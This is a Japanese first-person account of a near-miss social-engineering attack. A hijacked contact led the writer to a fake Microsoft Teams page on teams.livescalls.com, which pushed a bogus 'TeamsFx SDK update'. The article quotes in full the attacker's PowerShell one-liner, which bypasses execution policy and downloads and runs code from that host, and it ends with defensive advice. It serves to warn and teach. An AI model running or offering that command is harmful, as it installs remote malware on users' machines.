Microsoft Teamsの通話中にハッキングされそうになった — 詐欺の手口はこうだ

今日早朝、Microsoft Teams の通話という、ごく日常的で一見無害なものを悪用するために設計された手の込んだソーシャル エンジニアリングの計画の犠牲者になるところだった経緯をお話ししましょう。. 

やり取りの大部分において、異常なことは何も起きませんでした。. 

業界の連絡先だと思っていた人が私に連絡してきて、Microsoft Teams で会議を設定するよう頼んできたので、協力者になりたいという私の心は喜んで電話に出ていきました。. 

ネタバレ注意: 電話の相手はなりすましで、私のコンピューターで悪意のあるコードを実行させようとしました。. 

私は、暗号通貨や Web3 コミュニティの友人、知人、同世代の人々への注意喚起として、ここでこの経験全体を詳しく話します。. 

今日はほとんど私だったが、明日は別の誰かになるかもしれない。. 

ステップ1：セットアップ - 「昔の友達と電話で近況を話そう」 

有名な暗号通貨 PR 代理店のトップ社員として知っている人の Telegram アカウントからテキストを受け取ったとき、フィッシング詐欺に巻き込まれるなんて考えも及ばないはずです。. 

典型的な危険信号もすぐには現れませんでした。. 

これはランダムなDMではありませんでした。. 

私が話していたのは、「i」が微妙に「l」に置き換えられているなりすましアカウントではありません。 

実際、私もそのアカウントでチャット履歴があったので、相手は本物の人間だと思っていました。. 

再会を祝って、すっかり友好的な会話を始めた時から、何の違和感も感じられなかった。ほどなくして、30分のミーティングを予約するためのCalendlyのリンクと、Microsoft Teamsの通話への招待が届いた。.

先ほども申し上げたように、やり取りを通して私のレーダーは一度も外れることはありませんでした。一流PR会社の幹部社員に期待されるのと同じレベルのプロ意識と忍耐力を感じました。. 

私が知っていたのは、業界の連絡先の Calendly ページから Teams 会議をスケジュールしたということだけでした。.

詐欺師はハッキングされたアカウントを使用して連絡を取り、Teams 会議リンクを送信します。.

ステップ2：「デスクトップ版のみ参加」の罠 

会議の日がやってきました。これまで少なくとも1000回はやってきたように、スマートフォンでTeams会議リンクをクリックしました。しかし、いつものようにすぐに会議に参加できませんでした。通話にリダイレクトされる代わりに、「主催者の設定により、モバイルデバイスからのこの会議へのアクセスは許可されていません」という画面が表示されました。 

「やばい！こんなこと今まで一度もなかったのに。」 

まあ、それはdent でもなかったんです。. 

後から考えてみると、それがおそらく最初の本当の危険信号だったのでしょう。. 

エラー画面はデザインの一部です。詐欺師は、悪意のあるペイロードがPCでのみ実行されるコマンドラインスクリプトであるため、デスクトップまたはラップトップを使用していることを必要としています。.

ブラウザの URL「 teams.livescalls.com」は実際の Microsoft ドメインではありません。

正規の Teams 会議では、 teams.microsoft.comまたはteams.live.com が使用されます。 

「livescalls.com」ドメインは、遠くから見ると本物とよく似ていますが、よく見ると本物とはかけ離れています。. 

1つはMicrosoftが管理するサイトで、1日あたり3億2000万人以上のアクティブユーザーを擁していると主張しています。もう1つは、攻撃者が管理する完全に偽のサイトです。. 

公平を期すために言うと、一部の組織ではチームミーティングにカスタムドメインを使用しているかもしれません。しかし、世界経済フォーラムによると、2025年には詐欺師に1兆ドル以上の資金が失われるとのことです。これは、私にとってスパイダーセンスを無視できない十分な理由です。. 

偽の「チームアクセス通知」ページはモバイルアクセスをブロックし、悪意のあるスクリプトが実行される可能性のあるデスクトップ環境の使用を強制します。URLはteams.livescalls.comです。Microsoftドメインではありません。.

詐欺師は、「パートナーが待っています」と主張して、モバイルがブロックされた後にデスクトップで参加するように被害者に圧力をかけます。

ステップ3: ペイロード - 「TeamsFx SDKを更新する」

デスクトップ版のTeams会議では、Microsoftの公式ドキュメントに載っているような、プロがデザインしたページが表示されました。TeamsFx SDKが2025年9月までに廃止されるというMicrosoftの公式な説明も含まれていました。. 

解決策は？ コード ブロックをコピーして、ターミナルまたはコマンド プロンプトで実行します。.

Googleで検索すれば、似たようなSDKが存在することが分かります。ただ、今回のチームの会議では必要ありません。. 

このコードは一見無害に見えます。TeamsFx_API_KEYやMS_Teams_API_SECRETといった、いかにも公式っぽい名前の環境変数を設定しているからです。しかし、真の攻撃ベクトルは中間のどこかに挟まれており、攻撃者はあなたが問題に気づくことを期待していません。

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

この 1 行は PowerShell セキュリティ ポリシーをバイパスし (-ep bypass)、攻撃者のサーバーからコードをダウンロードして、すぐに実行します (iex = Invoke-Expression)。. 

そして、攻撃者がホストしているマルウェア、キーロガー、またはリモート アクセス ツールが、デバイスに静かにインストールされます。.

偽のTeams会議インターフェース。参加者に悪意のある「TeamsFx SDKアップデート」ページが表示されています。通話に参加している参加者はAI生成の動画です。.

ステップ4：「心配しないで、安全だから」というプレッシャー段階

私がスクリプトを実行することに躊躇していると伝えると、詐欺師はすぐに安心させる言葉とプレッシャーをかけてきました。. 

「心配しないでください。とても簡単で安全です」という行は、PC でコマンド プロンプトを開く方法を示すスクリーンショットの指示に簡単に従うようにするためのものでした。. 

「パートナーはすでに Zoom に参加しています」というメッセージは、簡単なコマンド プロンプトの実行方法がわからないために、全員にプラットフォームを切り替えさせなくて済むというプレッシャーを感じさせるはずでした。.

安心もしませんでしたし、プレッシャーも感じませんでした。.

通話をGoogle Meetに切り替えることを提案したのですが、彼らは拒否しました。どうやら、彼らの詐欺は偽のTeams設定を通してのみ機能するようです。.

詐欺師は、悪意のあるコードを実行するための手順を段階的に送信し、「心配しないでください。非常に簡単で安全です」と被害者を安心させます。

ステップ5: ブラフコール — ブロックされ削除される

スクリプトとドメインをチェックした後、私は自分の疑いを確認しました。私はソーシャル エンジニアリングの標的となり、あと数歩で世界経済フォーラムの 2026 年統計の一部に加わるところでした。. 

私は詐欺師に直接こう言いました。「確認したところ、このコマンドとウェブサイトは正規のものではありません。残念ながら、私にはできません」。もしまだチャットを続けたいのであれば、Google Meetで会話を続けることを提案しました。.

「しかし、会議は現在進行中です」というのが相手からのメッセージでした。. 

予想通り、彼らの返答は、会議への参加がいかに緊急であるかを私に気づかせるものでした。結局のところ、パートナーの皆様をあまり長く待たせたくなかったのです。.

しばらくして、彼らは私たちのやり取りをすべて削除し、私をブロックしました。. 

ああ…それはただの危険信号じゃない。深紅の色合いだね。. 

ビジネス上の連絡先は、ソフトウェアの更新について質問した瞬間に会話履歴全体を削除したり、ブロックしたりすることはありません。.

詐欺だと判明した後、攻撃者は会議が「現在進行中」であると主張し、すべてのメッセージを削除して被害者をブロックします。.

自分を守る方法

この種の攻撃は、暗号通貨、Web3、そしてテクノロジー業界全体で急増しています。詐欺師は、PR担当者、投資家、プロジェクトリーダーの実在するアカウントを乗っ取ったり、なりすまし、高価値な個人を狙っています。安全を確保するための方法をご紹介します。

• 会議ページからコマンドを実行しないでください。正規のビデオ通話プラットフォームでは、ターミナルやコマンドプロンプトにコードを貼り付けるように要求することはありません。
• URLを確認してください。実際のMicrosoft Teams会議は、teams.microsoft.comまたはteams.live.comでライブ配信されます。「teams.livescalls.com」などの類似ドメインではありません。
• 「デスクトップのみ」という要件には注意が必要です。会議でモバイルアクセスがブロックされている場合、それはスクリプトを実行できるマシンに誘導するための意図的な策略です。
• 別のチャネルで相手を確認してください。既知の連絡先から通常とは異なる会議リンクが送られてきた場合は、直接電話をかけるか、別のプラットフォームでメッセージを送信して確認してください。
• 「powershell -ep bypass」と「iex」に注意してください。これらは、あらゆるスクリプトにおいて最も危険な2つの兆候です。前者はセキュリティを無効にし、後者はダウンロードしたコードを盲目的に実行します。
• 既にスクリプトを実行済みの場合：直ちにインターネットから切断してください。マルウェアの完全スキャン（Malwarebytes、Windows Defender Offline）を実行してください。別のクリーンなデバイスですべてのパスワードを変更してください。暗号通貨ウォレットと銀行口座で不正な取引がないか監視してください。

これが暗号通貨とWeb3にとってなぜ重要なのか

これは、攻撃者が広範囲に網を張り巡らせて何を引っ掛けるかを狙う、典型的なフィッシング行為とは言えません。. 

いいえ、これは標的を絞った、数日間にわたるソーシャルエンジニアリング作戦でした。攻撃者は数日間、業界の同僚に扮して親密な関係を築き、Microsoftの偽ページを使ってTeamsの通話中に技術的な問題の解決方法をさりげなく案内しようとしました。. 

dent情報を盗む場合でも、暗号通貨ウォレットを空にする場合でも、永続的なリモート アクセス マルウェアをインストールする場合でも、攻撃者には得るものはすべてあり、失うものは何もありません。. 

創業者、投資家、あるいは暗号通貨やテクノロジー業界で会議に出席する方は、この記事をチームメンバーと共有してください。こうした詐欺を実行する者たちはますます巧妙化しており、唯一の防御策は意識を高めることです。.